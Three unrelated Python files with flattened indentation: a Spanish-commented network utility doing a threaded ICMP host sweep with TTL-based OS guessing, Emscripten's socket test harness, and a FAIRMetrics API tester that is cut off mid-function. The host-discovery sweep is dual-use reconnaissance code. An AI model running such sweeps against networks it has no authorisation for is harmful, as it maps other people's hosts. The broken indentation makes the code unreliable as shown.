result.append([r,f"{YELLOW} Send data to: {host.ljust(15)} {msg}",host,output.split("\n")[1]])
"""
@args:
<prefix> Es un valor entero que va hasta 0-32 para generar una mascara de red
"""
def create_masc_by_prefix(prefix):
net=[]
for i in range(4):
if (prefix-8)>=0:
net.append(255)
prefix-=8
if prefix==7:
net.append(254)
elif prefix==6:
net.append(252)
elif prefix==5:
net.append(248)
elif prefix==4:
net.append(240)
elif prefix==3:
net.append(224)
elif prefix==2:
net.append(192)
elif prefix==1:
net.append(128)
mis=4-len(net)
for i in range(mis):
net.append(0)
return net
"""
@args:
<srcs> Es nuestra dirección ip en forma de string
<host> Es la dirección ip en forma de string
<result> Es una lista la cual almacenara los resultados de la función
"""
def is_host_up(srcs,host,result):
p=sr1(IP(src=srcs,dst=host)/ICMP()/"hola",timeout=15,verbose=False)
if p is None:
result.append([False,f"{YELLOW} Send data to: {host.ljust(15)} {RED} without answer [x]{END}",host,None])
else:
result.append([True,f"{YELLOW} Send data to: {host.ljust(15)} {GREEN} with answer [✓]{END}",host,p.getlayer(IP).ttl])
"""
@args:
<net> Es la mascara de red en forma de lista y de tipo int
"""
def determinate_prefix(net):
c=0
for i in range(4):
if net[i]==255:
c+=8
elif net[i]==254:
c+=7
elif net[i]==252:
c+=6
elif net[i]==248:
c+=5
elif net[i]==240:
c+=4
elif net[i]==224:
c+=3
elif net[i]==192:
c+=2
elif net[i]==128:
c+=(1)
return c
"""
@args:
<ip> Es una dirección ip la cual va a ser utilizada para generar el identificador de red en formato int
<net> Es nuestra mascara de red en formato int
"""
def get_id_net(ip,net):
idnet=[]
for i in range(4):
idnet.append((ip[i]&net[i]))
return idnet
"""
@args:
<idnet> Es el identificador de la subred de tipo lista e int
<net> Es la mascara de red de tipo lista e int
"""
def get_broadcast_ip(idnet,net):
ran=[]
for i in range(4):
ran.append((idnet[i]|((~net[i])&0xFF)))
return ran
"""
@args:
<ttl> Es un valor entero que va desde 0-255
"""
def check_os_by_ttl(ttl):
if ttl<=64:
return f"Unix-OS {64-ttl}"
elif ttl>64 and ttl<=128:
return f"MS-DOS_Windows-OS {128-ttl}"
elif ttl>128:
return f"Cisco_Router_IOS {255-ttl}"
"""
@args:
<ips> Es la primer dirección ip de la subred en formato de lista e int
<broadcast> Es la dirección de Broadcast en formato de lista e int
"""
def scan_range(ips,broadcast):
responde=[]
threads=[]
positivos=[]
c=35
i=0
b=0
while(True):
if i%c==0 and i>0:
for t in range(len(threads)):
threads[t].join()
#print(responde[t][1])
if responde[t][0]:
ttl=responde[t][3].split("ttl=")[1]
ttl=int(ttl.split(" ")[0])
positivos.append({responde[t][2]:check_os_by_ttl(ttl)})
threads=[]
responde=[]
b+=1
threads.append(Thread(target=ping,args=(f"{ips[0]}.{ips[1]}.{ips[2]}.{ips[3]}",responde)))
threads[-1].start()
i+=1
if ips[3]+1==256:
ips[3]=0
if ips[2]+1==256:
ips[2]=0
if ips[1]+1==256:
ips[1]=0
else:
ips[1]+=1
else:
ips[2]+=1
else:
ips[3]+=1
if ips==broadcast:
break
for t in range(len(threads)):
threads[t].join()
#print(responde[t][1])
if responde[t][0]:
ttl=responde[t][3].split("ttl=")[1]
ttl=int(ttl.split(" ")[0])
positivos.append({responde[t][2]:check_os_by_ttl(ttl)})
return positivos
"""
@args:
<arr> es el arreglo que contiene los diccionarios de respuesta
<ip> es la direccion ip en formato de string el cual verificara si esta
no en las respuestas
"""
def check_str_ip_in_arr_dict(arr,ip):
for i in arr:
if ip in i.keys():
return True
return False
"""
@args:
<dict> es el diccionario de routers para ver las interconexiones que hay entre ellos
"""
def verifica_conectividad(dict,arr_resp,dict_int):
conexiones=[]
dict_conexiones=[]
for i,j in dict.items():
for k,v in dict.items():
if k!=i:
for a,b in v.items():
if b in j.values():
if (f"{i}-{k}:{b}" not in conexiones) and (f"{k}-{i}:{b}" not in conexiones):
r1=a.split("-sub")[0]
r2=""
for c,d in j.items():
if d==b:
r2=c.split("-sub")[0]
ip_r1=dict_int[i][r2].split("/")[0]
ip_r2=dict_int[k][r1].split("/")[0]
if (check_str_ip_in_arr_dict(arr_resp,ip_r1) and check_str_ip_in_arr_dict(arr_resp,ip_r2)):
conexiones.append(f"{i}-{k}:{b}")
diccio={"ip_1":ip_r2,"interface_1":r1,"host_1":k,
"ip_2":ip_r1,"interface_2":r2,"host_2":i}
dict_conexiones.append(diccio)
return [conexiones,dict_conexiones]
def verifica_index(arr,patern):
c=0
for i in arr:
if patern in i:
break
c+=1
return c
def create_wildcard(net):
wildcard=[]
for i in range(4):
wildcard.append(net[i]-255)
if wildcard[i]<0:
wildcard[i]=-wildcard[i]
return wildcard
|
test_sockets.py
|
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
import multiprocessing
import os
import socket
import shutil
import sys
import time
from subprocess import Popen
if __name__ == '__main__':
raise Exception('do not run this file directly; do something like: tests/runner sockets')
try:
import websockify
except Exception:
# websockify won't successfully import on Windows under Python3, because socketserver.py doesn't export ForkingMixIn.
# (On python2, ForkingMixIn was exported but it didn't actually work on Windows).
# Swallowing the error here means that this file can always be imported, but won't work if actually used on Windows,
# which is the same behavior as before.
pass
import clang_native
from common import BrowserCore, no_windows, create_file, test_file, read_file
from tools import shared, config, utils
from tools.shared import PYTHON, EMCC, path_from_root, WINDOWS, run_process, CLANG_CC
npm_checked = False
def clean_processes(processes):
for p in processes:
if (not hasattr(p, 'exitcode') or p.exitcode is None) and (not hasattr(p, 'returncode') or p.returncode is None):
# ask nicely (to try and catch the children)
try:
p.terminate() # SIGTERM
except OSError:
pass
time.sleep(1)
# send a forcible kill immediately afterwards. If the process did not die before, this should clean it.
try:
p.terminate() # SIGKILL
except OSError:
pass
class WebsockifyServerHarness():
def __init__(self, filename, args, listen_port, do_server_check=True):
self.processes = []
self.filename = filename
self.listen_port = listen_port
self.target_port = listen_port - 1
self.args = args or []
self.do_server_check = do_server_check
def __enter__(self):
# compile the server
# NOTE empty filename support is a hack to support
# the current test_enet
if self.filename:
run_process([CLANG_CC, test_file(self.filename), '-o', 'server', '-DSOCKK=%d' % self.target_port] + clang_native.get_clang_native_args() + self.args, env=clang_native.get_clang_native_env())
process = Popen([os.path.abspath('server')])
self.processes.append(process)
# start the websocket proxy
print('running websockify on %d, forward to tcp %d' % (self.listen_port, self.target_port), file=sys.stderr)
wsp = websockify.WebSocketProxy(verbose=True, listen_port=self.listen_port, target_host="127.0.0.1", target_port=self.target_port, run_once=True)
self.websockify = multiprocessing.Process(target=wsp.start_server)
self.websockify.start()
self.processes.append(self.websockify)
# Make sure both the actual server and the websocket proxy are running
for i in range(10):
try:
if self.do_server_check:
server_sock = socket.create_connection(('localhost', self.target_port), timeout=1)
server_sock.close()
proxy_sock = socket.create_connection(('localhost', self.listen_port), timeout=1)
proxy_sock.close()
break
except IOError:
time.sleep(1)
else:
clean_processes(self.processes)
raise Exception('[Websockify failed to start up in a timely manner]')
print('[Websockify on process %s]' % str(self.processes[-2:]))
def __exit__(self, *args, **kwargs):
# try to kill the websockify proxy gracefully
if self.websockify.is_alive():
self.websockify.terminate()
self.websockify.join()
# clean up any processes we started
clean_processes(self.processes)
class CompiledServerHarness():
def __init__(self, filename, args, listen_port):
self.processes = []
self.filename = filename
self.listen_port = listen_port
self.args = args or []
def __enter__(self):
# assuming this is only used for WebSocket tests at the moment, validate that
# the ws module is installed
global npm_checked
if not npm_checked:
child = run_process(config.NODE_JS + ['-e', 'require("ws");'], check=False)
assert child.returncode == 0, '"ws" node module not found. you may need to run npm install'
npm_checked = True
# compile the server
proc = run_process([EMCC, '-Werror', test_file(self.filename), '-o', 'server.js', '-DSOCKK=%d' % self.listen_port] + self.args)
print('Socket server build: out:', proc.stdout or '', '/ err:', proc.stderr or '')
process = Popen(config.NODE_JS + ['server.js'])
self.processes.append(process)
def __exit__(self, *args, **kwargs):
# clean up any processes we started
clean_processes(self.processes)
# always run these tests last
# make sure to use different ports in each one because it takes a while for the processes to be cleaned up
# Executes a native executable server process
class BackgroundServerProcess():
def __init__(self, args):
self.processes = []
self.args = args
def __enter__(self):
print('Running background server: ' + str(self.args))
process = Popen(self.args)
self.processes.append(process)
def __exit__(self, *args, **kwargs):
clean_processes(self.processes)
def NodeJsWebSocketEchoServerProcess():
return BackgroundServerProcess(config.NODE_JS + [test_file('websocket/nodejs_websocket_echo_server.js')])
def PythonTcpEchoServerProcess(port):
return BackgroundServerProcess([PYTHON, test_file('websocket/tcp_echo_server.py'), port])
class sockets(BrowserCore):
emcc_args = []
@classmethod
def setUpClass(cls):
super().setUpClass()
print()
print('Running the socket tests. Make sure the browser allows popups from localhost.')
print()
# Use emscripten root for node module lookup. This is needed because the unit tests each
# run with CWD set to a temporary directory outside the emscripten tree.
print('Setting NODE_PATH=' + path_from_root('node_modules'))
os.environ['NODE_PATH'] = path_from_root('node_modules')
def test_sockets_echo(self, extra_args=[]):
# Note: in the WebsockifyServerHarness and CompiledServerHarness tests below, explicitly use consecutive server listen ports,
# because server teardown might not occur deterministically (python dtor time) and is a bit racy.
# WebsockifyServerHarness uses two port numbers, x and x-1, so increment it by two.
# CompiledServerHarness only uses one. Start with 49160 & 49159 as the first server port addresses. If adding new tests,
# increment the used port addresses below.
# Websockify-proxied servers can't run dgram tests
harnesses = [
(CompiledServerHarness(test_file('sockets/test_sockets_echo_server.c'), ['-DTEST_DGRAM=0'], 49161), 0),
(CompiledServerHarness(test_file('sockets/test_sockets_echo_server.c'), ['-DTEST_DGRAM=1'], 49162), 1),
# The following forces non-NULL addr and addlen parameters for the accept call
(CompiledServerHarness(test_file('sockets/test_sockets_echo_server.c'), ['-DTEST_DGRAM=0', '-DTEST_ACCEPT_ADDR=1'], 49163), 0)
]
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
harnesses += [(WebsockifyServerHarness(test_file('sockets/test_sockets_echo_server.c'), [], 49160), 0)]
for harness, datagram in harnesses:
with harness:
self.btest_exit(test_file('sockets/test_sockets_echo_client.c'), args=['-DSOCKK=%d' % harness.listen_port, '-DTEST_DGRAM=%d' % datagram])
def test_sockets_echo_pthreads(self, extra_args=[]):
self.test_sockets_echo(['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
def test_sdl2_sockets_echo(self):
harness = CompiledServerHarness('sdl2_net_server.c', ['-sUSE_SDL=2', '-sUSE_SDL_NET=2'], 49164)
with harness:
self.btest_exit('sdl2_net_client.c', args=['-sUSE_SDL=2', '-sUSE_SDL_NET=2', '-DSOCKK=%d' % harness.listen_port])
def test_sockets_async_echo(self):
# Websockify-proxied servers can't run dgram tests
harnesses = [
(CompiledServerHarness(test_file('sockets/test_sockets_echo_server.c'), ['-DTEST_DGRAM=0', '-DTEST_ASYNC=1'], 49167), 0),
(CompiledServerHarness(test_file('sockets/test_sockets_echo_server.c'), ['-DTEST_DGRAM=1', '-DTEST_ASYNC=1'], 49168), 1),
# The following forces non-NULL addr and addlen parameters for the accept call
(CompiledServerHarness(test_file('sockets/test_sockets_echo_server.c'), ['-DTEST_DGRAM=0', '-DTEST_ACCEPT_ADDR=1', '-DTEST_ASYNC=1'], 49169), 0)
]
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
harnesses += [(WebsockifyServerHarness(test_file('sockets/test_sockets_echo_server.c'), ['-DTEST_ASYNC=1'], 49166), 0)]
for harness, datagram in harnesses:
print('harness:', harness)
with harness:
self.btest_exit(test_file('sockets/test_sockets_echo_client.c'), args=['-DSOCKK=%d' % harness.listen_port, '-DTEST_DGRAM=%d' % datagram, '-DTEST_ASYNC=1'])
return
# Deliberately attempt a connection on a port that will fail to test the error callback and getsockopt
print('expect fail')
self.btest_exit(test_file('sockets/test_sockets_echo_client.c'), args=['-DSOCKK=49169', '-DTEST_ASYNC=1'])
def test_sockets_echo_bigdata(self):
sockets_include = '-I' + test_file('sockets')
# generate a large string literal to use as our message
message = ''
for i in range(256 * 256 * 2):
message += str(chr(ord('a') + (i % 26)))
# re-write the client test with this literal (it's too big to pass via command line)
src = read_file(test_file('sockets/test_sockets_echo_client.c'))
create_file('test_sockets_echo_bigdata.c', src.replace('#define MESSAGE "pingtothepong"', '#define MESSAGE "%s"' % message))
harnesses = [
(CompiledServerHarness(test_file('sockets/test_sockets_echo_server.c'), ['-DTEST_DGRAM=0'], 49172), 0),
(CompiledServerHarness(test_file('sockets/test_sockets_echo_server.c'), ['-DTEST_DGRAM=1'], 49173), 1)
]
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
harnesses += [(WebsockifyServerHarness(test_file('sockets/test_sockets_echo_server.c'), [], 49171), 0)]
for harness, datagram in harnesses:
with harness:
self.btest_exit('test_sockets_echo_bigdata.c', args=[sockets_include, '-DSOCKK=%d' % harness.listen_port, '-DTEST_DGRAM=%d' % datagram])
@no_windows('This test is Unix-specific.')
def test_sockets_partial(self):
for harness in [
WebsockifyServerHarness(test_file('sockets/test_sockets_partial_server.c'), [], 49180),
CompiledServerHarness(test_file('sockets/test_sockets_partial_server.c'), [], 49181)
]:
with harness:
self.btest_exit(test_file('sockets/test_sockets_partial_client.c'), assert_returncode=165, args=['-DSOCKK=%d' % harness.listen_port])
@no_windows('This test is Unix-specific.')
def test_sockets_select_server_down(self):
for harness in [
WebsockifyServerHarness(test_file('sockets/test_sockets_select_server_down_server.c'), [], 49190, do_server_check=False),
CompiledServerHarness(test_file('sockets/test_sockets_select_server_down_server.c'), [], 49191)
]:
with harness:
self.btest_exit(test_file('sockets/test_sockets_select_server_down_client.c'), args=['-DSOCKK=%d' % harness.listen_port])
@no_windows('This test is Unix-specific.')
def test_sockets_select_server_closes_connection_rw(self):
for harness in [
WebsockifyServerHarness(test_file('sockets/test_sockets_echo_server.c'), ['-DCLOSE_CLIENT_AFTER_ECHO'], 49200),
CompiledServerHarness(test_file('sockets/test_sockets_echo_server.c'), ['-DCLOSE_CLIENT_AFTER_ECHO'], 49201)
]:
with harness:
self.btest_exit(test_file('sockets/test_sockets_select_server_closes_connection_client_rw.c'), args=['-DSOCKK=%d' % harness.listen_port])
@no_windows('This test uses Unix-specific build architecture.')
def test_enet(self):
# this is also a good test of raw usage of emconfigure and emmake
shared.try_delete('enet')
shutil.copytree(test_file('third_party', 'enet'), 'enet')
with utils.chdir('enet'):
self.run_process([path_from_root('emconfigure'), './configure', '--disable-shared'])
self.run_process([path_from_root('emmake'), 'make'])
enet = [self.in_dir('enet', '.libs', 'libenet.a'), '-I' + self.in_dir('enet', 'include')]
for harness in [
CompiledServerHarness(test_file('sockets/test_enet_server.c'), enet, 49210)
]:
with harness:
self.btest_exit(test_file('sockets/test_enet_client.c'), args=enet + ['-DSOCKK=%d' % harness.listen_port])
def test_nodejs_sockets_echo(self):
# This test checks that sockets work when the client code is run in Node.js
if config.NODE_JS not in config.JS_ENGINES:
self.skipTest('node is not present')
harnesses = [
(CompiledServerHarness(test_file('sockets/test_sockets_echo_server.c'), ['-DTEST_DGRAM=0'], 59162), 0),
(CompiledServerHarness(test_file('sockets/test_sockets_echo_server.c'), ['-DTEST_DGRAM=1'], 59164), 1)
]
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
harnesses += [(WebsockifyServerHarness(test_file('sockets/test_sockets_echo_server.c'), [], 59160), 0)]
# Basic test of node client against both a Websockified and compiled echo server.
for harness, datagram in harnesses:
with harness:
expected = 'do_msg_read: read 14 bytes'
self.do_runf(test_file('sockets/test_sockets_echo_client.c'), expected, emcc_args=['-DSOCKK=%d' % harness.listen_port, '-DTEST_DGRAM=%d' % datagram])
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
# Test against a Websockified server with compile time configured WebSocket subprotocol. We use a Websockified
# server because as long as the subprotocol list contains binary it will configure itself to accept binary
# This test also checks that the connect url contains the correct subprotocols.
print("\nTesting compile time WebSocket configuration.\n")
for harness in [
WebsockifyServerHarness(test_file('sockets/test_sockets_echo_server.c'), [], 59166)
]:
with harness:
self.run_process([EMCC, '-Werror', test_file('sockets/test_sockets_echo_client.c'), '-o', 'client.js', '-sSOCKET_DEBUG', '-sWEBSOCKET_SUBPROTOCOL="base64, binary"', '-DSOCKK=59166'])
out = self.run_js('client.js')
self.assertContained('do_msg_read: read 14 bytes', out)
self.assertContained(['connect: ws://127.0.0.1:59166, base64,binary', 'connect: ws://127.0.0.1:59166/, base64,binary'], out)
# Test against a Websockified server with runtime WebSocket configuration. We specify both url and subprotocol.
# In this test we have *deliberately* used the wrong port '-DSOCKK=12345' to configure the echo_client.c, so
# the connection would fail without us specifying a valid WebSocket URL in the configuration.
print("\nTesting runtime WebSocket configuration.\n")
create_file('websocket_pre.js', '''
var Module = {
websocket: {
url: 'ws://localhost:59168/testA/testB',
subprotocol: 'text, base64, binary',
}
};
''')
for harness in [
WebsockifyServerHarness(test_file('sockets/test_sockets_echo_server.c'), [], 59168)
]:
with harness:
self.run_process([EMCC, '-Werror', test_file('sockets/test_sockets_echo_client.c'), '-o', 'client.js', '--pre-js=websocket_pre.js', '-sSOCKET_DEBUG', '-DSOCKK=12345'])
out = self.run_js('client.js')
self.assertContained('do_msg_read: read 14 bytes', out)
self.assertContained('connect: ws://localhost:59168/testA/testB, text,base64,binary', out)
# Test Emscripten WebSockets API to send and receive text and binary messages against an echo server.
# N.B. running this test requires 'npm install ws' in Emscripten root directory
def test_websocket_send(self):
with NodeJsWebSocketEchoServerProcess():
self.btest_exit(test_file('websocket/test_websocket_send.c'), args=['-lwebsocket', '-sNO_EXIT_RUNTIME', '-sWEBSOCKET_DEBUG'])
# Test that native POSIX sockets API can be used by proxying calls to an intermediate WebSockets -> POSIX sockets bridge server
def test_posix_proxy_sockets(self):
# Build the websocket bridge server
self.run_process(['cmake', path_from_root('tools/websocket_to_posix_proxy')])
self.run_process(['cmake', '--build', '.'])
if os.name == 'nt': # This is not quite exact, instead of "isWindows()" this should be "If CMake defaults to building with Visual Studio", but there is no good check for that, so assume Windows==VS.
proxy_server = os.path.join(self.get_dir(), 'Debug', 'websocket_to_posix_proxy.exe')
else:
proxy_server = os.path.join(self.get_dir(), 'websocket_to_posix_proxy')
with BackgroundServerProcess([proxy_server, '8080']):
with PythonTcpEchoServerProcess('7777'):
# Build and run the TCP echo client program with Emscripten
self.btest_exit(test_file('websocket/tcp_echo_client.cpp'), args=['-lwebsocket', '-sPROXY_POSIX_SOCKETS', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
|
test_metric.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import os
import urllib
import urllib.request
import json
import requests
from requests.exceptions import SSLError
import rdflib
from rdflib import Graph, plugin
from rdflib.serializer import Serializer
import argparse
import termcolor
from string import Template
import itertools
import threading
import time
import sys
from datetime import datetime, timedelta
# import joblib
# from joblib import Parallel, delayed
import multiprocessing
from multiprocessing import Pool
from tqdm import *
#!!!!! fait bugguer enumerate()
# from threading import *
import random
# from reprint import output
import subprocess
# timeout (connect, read) in secondes
TIMEOUT = (10, 3600)
PRINT_DETAILS = False
OUTPUT_DIR = "para_doi_test_output"
OUTPUT_PREF = "ptest"
parser = argparse.ArgumentParser(
description="A FAIRMetrics tester",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
# parser.add_argument("guid", help="The GUID to be tested (DOI, etc)")
parser.add_argument(
"-n", "--name", help="Print metric name to STDOUT", action="store_true"
)
parser.add_argument(
"-p", "--principle", help="Print principle number to STDOUT", action="store_true"
)
parser.add_argument(
"-d",
"--description",
help="Print description of the metrics to STDOUT",
action="store_true",
)
parser.add_argument(
"-c",
"--comment",
help="Zero or more letters from [iwfsc] (none=print all). Print comment messages for INFO, WARN, FAIL, SUCC, CRIT to STDOUT",
# default='all',
const="iwfsc",
nargs="?",
)
parser.add_argument(
"-wc",
"--write_comment",
help="Zero or more letters from [iwfsc] (none=print all). Filter comment messages for INFO, WARN, FAIL, SUCC, CRIT in output comment file",
# default='all',
const="iwfsc",
nargs="?",
)
parser.add_argument(
"-s", "--score", help="Print scores of the metrics to STDOUT", action="store_true"
)
parser.add_argument(
"-t", "--time", help="Print metric test time to STDOUT", action="store_true"
)
parser.add_argument(
"-i",
"--input",
help="The input GUID (Globally Unique Identifier: DOI, URL, etc...)",
)
parser.add_argument(
"-D",
"--directory",
help="Output directory",
default=OUTPUT_DIR,
)
parser.add_argument(
"-o", "--output", help="Output prefix filenames", default=OUTPUT_PREF
)
parser.add_argument(
"-tn",
"--thread_num",
help="Number of threads to use. Max available: " + str(multiprocessing.cpu_count()),
type=int,
choices=range(1, multiprocessing.cpu_count() + 1),
default=1,
)
def animated_loading(message):
"""
Add an animated character to show loading at the end of a message.
@param message String The message to be displayed
"""
# string of char the will be displayed in a loop
chars = "/—\|"
# the loop over the chars
for char in chars:
sys.stdout.write("\r" + message + char)
time.sleep(0.1)
sys.stdout.flush()
def processFunction(function, args, message):
"""
The function that execute another function through a wrapper allowing for an animated message while executed.
@param function Method A python function to be executed
@param args List The arguments of the function to be executed
@param message String The message to be displayed
"""
# List that will contains the results of the input function
res = []
# Initialize and start the process
the_process = threading.Thread(target=wrapper, args=(function, args, res))
the_process.start()
# Execute the animated message as long as the process is alive (executing the input function)
if PRINT_DETAILS:
while the_process.isAlive():
animated_loading(message)
the_process.join()
# print('test')
sys.stdout.write("\r\033[K")
sys.stdout.flush()
return res[0]
def wrapper(func, args, res):
"""
The wrapper that execute the input function.
@param func Method The python function to be executed
@param args List The arguments of the function to be executed
@param res List The list of results from the input function
"""
res.append(func(*args))
def testMetric(metric_api_url, data):
"""
Send a request to the URL api that will test the metric.
@param metric_api_url String The URL of one metric to test the data against
@param data dict Contain the GUID to be tested
@return String Result returned by the request that is JSON-LD formated
"""
##### BRICOLAGE A MODIFIER QUAND FAIRMETRICS SERA A JOUR
# base_url = "http://linkeddata.systems/cgi-bin/FAIR_Tests/"
# sub_url = metric_api_url.split('/')[5]
# metric_api_url = base_url + sub_url
# print(metric_api_url)
while True:
try:
response = requests.request(
method="POST", url=metric_api_url, data=data, timeout=TIMEOUT
)
result = response.text
break
except requests.exceptions.Timeout:
print("Timeout, retrying...")
time.sleep(5)
except requests.exceptions.ReadTimeout:
print("ReadTimeout, retrying...")
time.sleep(20)
except SSLError:
print("SSLError, retrying...")
time.sleep(10)
return result
def testMetrics(GUID):
"""
Call multiples time "testMetric" to test each metric against one GUID.
@param GUID String The GUID to be tested
@return tuple (headers_list, descriptions_list, test_score_list, time_list, comments_list)
"""
if args.directory:
OUTPUT_DIR = args.directory
if args.output:
OUTPUT_PREF = args.output
# Create the data dict containing the GUID
data = '{"subject": "' + GUID + '"}'
data = data.encode("utf-8")
# Retrieve all the metrics general info and api urls
metrics = getMetrics()
metric_test_results = [
{
"@id": "metric",
"score": GUID,
"principle": "GUID",
"test_time": GUID,
"comment": '"' + GUID + '"',
"description": "Description",
}
]
if args.thread_num > 1:
metrics_list = []
for metric in metrics:
metric_test_results.append(
{
"@id": metric["@id"],
"principle": metric["principle"].rsplit("/", 1)[-1],
}
)
metrics_list.append((metric, data))
# initialize parallelized
num_cores = multiprocessing.cpu_count()
p = Pool(num_cores)
list_results = []
# starting metrics test
for result in tqdm(
p.imap_unordered(pTestMetric, metrics_list),
total=len(metrics_list),
dynamic_ncols=True,
):
list_results.append(result)
p.close()
p.join()
# append res to lists
for result in list_results:
for i, test in enumerate(metric_test_results):
if result:
if result["@id"] == test["@id"]:
metric_test_results[i]["score"] = result["score"]
metric_test_results[i]["test_time"] = result["test_time"]
metric_test_results[i]["comment"] = result["comment"]
metric_test_results[i]["description"] = result["description"]
else:
n = 0
# iterate over each metric
for metric in metrics:
n += 1
# retrieve more specific info about each metric
metric_info = processFunction(
getMetricInfo, [metric["@id"]], "Retrieving metric informations... "
)
# retrieve the name (principle) of each metric (F1, A1, I2, etc)
principle = metric_info["principle"].rsplit("/", 1)[-1]
# principle = metric_info["principle"]
# get the description on the metric
description = '"' + metric_info["description"] + '"'
if True:
# if principle[0:2] != 'I2':
# if principle[0:2] == 'I2':
if PRINT_DETAILS:
# print informations related to the metric
printMetricInfo(metric_info)
# evaluate the metric
start_time = getCurrentTime()
metric_evaluation_result_text = processFunction(
testMetric,
[metric["smarturl"], data],
"Evaluating metric " + principle + "... ",
)
end_time = getCurrentTime()
# print(metric_evaluation_result_text)
metric_evaluation_result = json.loads(metric_evaluation_result_text)
test_time = end_time - start_time
if PRINT_DETAILS:
# print results of the evaluation
printTestMetricResult(metric_evaluation_result_text, test_time)
# get comment
# REQUETE SPARQL !!!!!
comment = requestResultSparql(
metric_evaluation_result_text, "schema:comment"
)
# remove empty lines from the comment
comment = cleanComment(comment)
# filter comment based on args
if args.write_comment:
comment = filterComment(comment, args.write_comment)
comment = '"' + comment + '"'
# get the score
score = requestResultSparql(
metric_evaluation_result_text, "ss:SIO_000300"
)
score = str(int(float(score)))
# add score, principle, time, comment and description
metric_test_results.append(
{
"@id": metric["@id"],
"principle": principle,
"score": score,
"test_time": test_time,
"comment": comment,
"description": description,
}
)
# list that will contains the score for each metric test
test_score_list = []
# list that will contains the name of each (principle) metric test (F1, A1, I2, etc)
headers_list = []
# list that will contains the executation time for each metric test
time_list = []
# list that will contains the comment for each metric test
comments_list = []
# ist that will contains the description for each metric test
descriptions_list = []
for test_result in metric_test_results:
test_score_list.append(test_result["score"])
headers_list.append(test_result["principle"])
time_list.append(test_result["test_time"])
comments_list.append(test_result["comment"])
descriptions_list.append(test_result["description"])
sumScoresTimes(headers_list, test_score_list, time_list)
# write the list of score (and header if file doesnt exists yet) to a result file
writeScoreFile(
"\t".join(headers_list),
"\t".join(test_score_list),
OUTPUT_DIR,
"/" + OUTPUT_PREF + "_score.tsv",
)
# write a new line to the time file or create it
writeTimeFile(
"\t".join(headers_list),
"\t".join(map(str, time_list)),
OUTPUT_DIR,
"/" + OUTPUT_PREF + "_time.tsv",
)
# write a new line to the comment file or create it
writeCommentFile(
"\t".join(headers_list),
"\t".join(comments_list),
"\t".join(descriptions_list),
OUTPUT_DIR,
"/" + OUTPUT_PREF + "_comment.tsv",
)
### RAJOUT SOMME SCORES et temps dans stdout
# if args.score:
# if args.time:
return (
headers_list,
descriptions_list,
test_score_list,
list(map(str, time_list)),
comments_list,
)
def asyncTestMetric(metric):
global args
args = parser.parse_args()
args.write_comment = False
return pTestMetric(metric)
def pTestMetric(metric):
# retrieve more specific info about each metric
metric_info = getMetricInfo(metric[0]["@id"])
# retrieve the name (principle) of each metric (F1, A1, I2, etc)
principle = metric_info["principle"].rsplit("/", 1)[-1]
# get the description on the metric
description = '"' + metric_info["description"] + '"'
# if principle[0:2] != 'I2':
# if principle[0] == 'F':
if True:
start_time = getCurrentTime()
metric_evaluation_result_text = testMetric(metric[0]["smarturl"], metric[1])
end_time = getCurrentTime()
# print(metric_evaluation_result_text)
metric_evaluation_result = json.loads(metric_evaluation_result_text)
test_time = end_time - start_time
# get comment
# REQUETE SPARQL !!!!!
comment = requestResultSparql(metric_evaluation_result_text, "schema:comment")
# remove empty lines from the comment
comment = cleanComment(comment)
# filter comment based on args
if args.write_comment:
comment = filterComment(comment, args.write_comment)
comment = '"' + comment + '"'
# get the score
score = requestResultSparql(metric_evaluation_result_text, "ss:SIO_000300")
score = str(int(float(score)))
dict_result = {
"@id": metric[0]["@id"],
"score": score,
"principle": principle,
"test_time": test_time,
"comment": comment,
"description": description,
}
return dict_result
return False
def requestResultSparql(metric_evaluation_result_text, term):
g = rdflib.Graph()
result = g.parse(data=metric_evaluation_result_text, format="json-ld")
rdf_string = g.serialize(format="turtle").decode("utf-8")
# print(g.serialize(format="json-ld").decode("utf-8"))
# TODO use RDFLib graph traversal methods to retrieve some parts of the graphs
prefix = """
PREFIX obo:<http://purl.obolibrary.org/obo/>
PREFIX schema:<http://schema.org/>
PREFIX ss:<http://semanticscience.org/resource/>
"""
s = Template(
"""
$prefix
SELECT ?s ?p ?o
WHERE { ?s $term ?o }
"""
)
query_string = s.substitute(prefix=prefix, term=term)
query_res = result.query(query_string)
res_list = []
for (s, p, o) in query_res:
res_list.append(o)
return "\n".join(res_list)
def sumScoresTimes(headers_list, test_score_list, time_list):
""""""
sum_score_dict = {}
sum_dict = {}
for i, principle in enumerate(headers_list):
if i > 0:
lettre = principle[0]
score = test_score_list[i]
time = time_list[i]
# scores
if not lettre in sum_dict.keys():
sum_dict[lettre] = [(score, time)]
else:
sum_dict[lettre].append((score, time))
total_score = 0
total_time = timedelta()
for key, value_list in sum_dict.items():
letter_score = 0
letter_time = timedelta()
# accumulate values for each letter
for value in value_list:
letter_score += int(value[0])
letter_time += value[1]
# accumulate total values
total_score += letter_score
total_time += letter_time
# adding sum by caterogy (FAIR)
headers_list.append(key)
test_score_list.append(str(letter_score))
time_list.append(letter_time)
# adding total sum
headers_list.append("total")
test_score_list.append(str(total_score))
time_list.append(total_time)
# convert datetime in time_list to str
def writeTimeFile(headers_list, time_list, output_dir, filename):
""""""
if not os.path.isdir(output_dir):
os.makedirs(output_dir)
filename = output_dir + filename
exists = os.path.isfile(filename)
if exists:
file = open(filename, "a")
file.write("\n" + time_list)
file.close()
else:
file = open(filename, "w")
file.write(headers_list)
file.write("\n" + time_list)
file.close()
def writeCommentFile(
headers_list, test_comment_list, descriptions_list, output_dir, filename
):
"""
@param descriptions_list List Contains the description of eache principle added to the top of the file
"""
if not os.path.isdir(output_dir):
os.makedirs(output_dir)
filename = output_dir + filename
exists = os.path.isfile(filename)
if exists:
file = open(filename, "a")
file.write("\n" + test_comment_list)
file.close()
else:
file = open(filename, "w")
file.write(descriptions_list)
file.write("\n" + headers_list)
